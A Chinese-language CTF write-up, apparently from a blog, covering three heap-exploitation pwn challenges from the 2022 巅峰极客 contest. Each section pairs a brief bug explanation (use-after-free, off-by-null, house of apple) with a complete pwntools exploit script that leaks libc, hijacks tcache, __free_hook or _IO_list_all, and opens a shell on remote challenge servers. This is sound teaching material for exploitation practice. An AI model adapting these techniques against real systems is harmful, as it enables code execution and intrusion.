Single

2022 巅峰极客 Pwn Writeup

不得不说,icq的比赛🍉就是多

Gift

2.31的UAF,没有edit功能

通过bargain还价修改fd,伪造一条tcache的链来做到任意地址分配

注意到还的价格可以为负数,这样就可以避免0x10的限制而是将fd指针指向自身chunk内

from pwn import*
r=remote("123.56.45.214",44298)
#r=process('./pwn')
context.log_level='debug'

def new(size,content):
	r.recvuntil("your choice:\n")
	r.sendline("2")
	r.recvuntil("your choice:\n")
	r.sendline(str(size))
	r.recvline()
	r.send(content)

def delete(idx):
	r.recvuntil("your choice:\n")
	r.sendline("3")
	r.recvline()
	r.sendline(str(idx))

def show(idx):
	r.recvuntil("your choice:\n")
	r.sendline("4")
	r.recvline()
	r.sendline(str(idx))

def gift(idx,size):
	r.recvuntil("your choice:\n")
	r.sendline("5")
	r.recvline()
	r.sendline(str(idx))
	r.recvline()
	r.sendline(str(size))

new(1,"\n")
new(1,"\n")

delete(0)
delete(1)

show(1)
r.recvuntil("cost: ")
heap=int(r.recvline())-0x260
success("heap: "+hex(heap))

new(1,"\x00"*0x10+p64(heap+0x400)+"\x00"*0x68+p64(heap+0x410))
new(1,p64(heap+0x390))

delete(0)
delete(1)

gift(1,-0x10)

new(1,"\n")
new(1,"\n")
new(1,"\x00")

delete(0)

show(0)
r.recvuntil("cost: ")
libc_base=int(r.recvline())-0x3ebca0
success("libc_base: "+hex(libc_base))

new(1,p64(libc_base+0x3ed8d8))

new(1,"\n")
new(1,p64(libc_base+0x4f302))

delete(8)

#gdb.attach(r)

r.interactive()

smallcontainer

生硬的off by null,检测到\x11就置为\x00

还是2.27的libc,没有pre_size检测,常规方法造uaf即可

from pwn import*
r=remote("123.56.121.45",23924)
#r=process('./smallcontainer')
context.log_level='debug'

libc=ELF("./libc-2.27.so")

def new(size):
	r.recvuntil("> ")
	r.sendline("1")
	r.recvuntil(": ")
	r.sendline(str(size))

def delete(idx):
	r.recvuntil("> ")
	r.sendline("2")
	r.recvuntil(": ")
	r.sendline(str(idx))

def edit(idx,content):
	r.recvuntil("> ")
	r.sendline("3")
	r.recvuntil(": ")
	r.sendline(str(idx))
	r.send(content)

def show(idx):
	r.recvuntil("> ")
	r.sendline("4")
	r.recvuntil(": ")
	r.sendline(str(idx))

for i in range(10): new(0x208)

for i in range(3,10): delete(i)

for i in range(7): new(0x1F8)
for i in range(3,10): delete(i)

delete(0)

edit(2,"a"*0x1F8+p64(0x221))
edit(1,"a"*0x208)
edit(1,"a"*0x200+p64(0x420))

delete(2)

for i in range(7): new(0x208)

new(0x208)

show(1)

libc_base=int(r.recvuntil("This is a cyber container",drop=True),16)-libc.sym["__malloc_hook"]-0x70
success("libc_base: "+hex(libc_base))

new(0x108)

delete(9)
edit(1,p64(libc_base+libc.sym["__free_hook"]))

new(0x108)
new(0x108)

edit(10,p64(libc_base+libc.sym["system"]))
edit(0,"/bin/sh\n")

delete(0)

#gdb.attach(r)

r.interactive()

happy_note

2.34版本,一次UAF机会

常规泄漏之后,直接house of apple完事

from pwn import*
r=remote("182.92.74.66",17827)
#r=process('./happy_note')
context.log_level='debug'

libc=ELF("./libc.so.6")

def new(idx,size,mode):
	r.recvuntil(">> ")
	r.sendline("1")
	r.recvline()
	r.sendline(str(size))
	r.recvline()
	r.sendline(str(idx))
	r.recvline()
	r.sendline(str(mode))

def delete(idx):
	r.recvuntil(">> ")
	r.sendline("2")
	r.recvline()
	r.sendline(str(idx))

def show(idx):
	r.recvuntil(">> ")
	r.sendline("3")
	r.recvline()
	r.sendline(str(idx))

def edit(idx,content):
	r.recvuntil(">> ")
	r.sendline("4")
	r.recvline()
	r.sendline(str(idx))
	r.recvline()
	r.send(content)

def gift(idx):
	r.recvuntil(">> ")
	r.sendline("666")
	r.recvline()
	r.sendline(str(idx))

def xor(ptr1,ptr2):
	return (ptr1>>12)^ptr2

for i in range(11): new(i,0x108,1)

for i in range(7): delete(i)

gift(7)
show(7)

r.recvuntil("content: ")
libc_base=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-0x219cc0
success("libc_base: "+hex(libc_base))

_IO_wfile_jumps=libc_base+0x2160c0

new(0,0x100,1)

delete(9)
delete(7)

show(0)

r.recvuntil("content: ")
heap=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-0xc20
success("heap: "+hex(heap))

new(2,0x100,1)
new(3,0xE8,1)
new(4,0xE8,1)

delete(4)
delete(3)

edit(0,p64(xor(heap,libc_base+libc.sym["_IO_list_all"])))

new(5,0xE8,2)
new(6,0xE8,2)

new(7,0x200,1)

fake_IO_struct=""
fake_IO_struct=fake_IO_struct.ljust(0x18,"\x00")
fake_IO_struct+=p64(1)
fake_IO_struct=fake_IO_struct.ljust(0x58,"\x00")
fake_IO_struct+=p64(libc_base+0xeacef)
fake_IO_struct=fake_IO_struct.ljust(0x90,"\x00")
fake_IO_struct+=p64(heap+0xf30)
fake_IO_struct=fake_IO_struct.ljust(0xc8,"\x00")
fake_IO_struct+=p64(_IO_wfile_jumps)
fake_IO_struct=fake_IO_struct.ljust(0xd0,"\x00")
fake_IO_struct+=p64(heap+0xf30)

edit(7,fake_IO_struct)

edit(6,p64(heap+0xf30))


#gdb.attach(r,"b _IO_wdoallocbuf")

delete(9)

r.interactive()

附件下载

暂无评论

发表评论